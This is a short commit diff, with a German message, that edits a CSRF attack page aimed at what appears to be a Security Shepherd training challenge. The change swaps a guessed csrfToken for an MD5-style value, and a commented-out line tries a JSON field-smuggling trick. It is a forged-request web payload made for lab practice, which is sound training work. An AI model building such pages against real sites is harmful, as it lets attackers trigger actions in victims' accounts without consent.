er hat mich reingelegt
Updated the csrfToken value in the form.

--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <body>
 <form action="https://shepherd.websec.dedyn.io/user/csrfchallengesix/plusplus" method="POST" name="csrf">
 <input type="hidden" name="userId" value="398a2626d934ee0e28e46e4c5d5c1cab10e1a9b8"/>
-<input type="hidden" name="csrfToken" value="2"/>
+<input type="hidden" name="csrfToken" value="eccbc87e4b5ce2fe28308fd9f2a7baf3"/>
 <!--input type="hidden" name='{"userId":"398a2626d934ee0e28e46e4c5d5c1cab10e1a9b8","' value='":"end"}'-->
 </form>
 <script>
@@ -10,6 +10,7 @@
 </script>
 </body>
 </html>
+
 
 
 
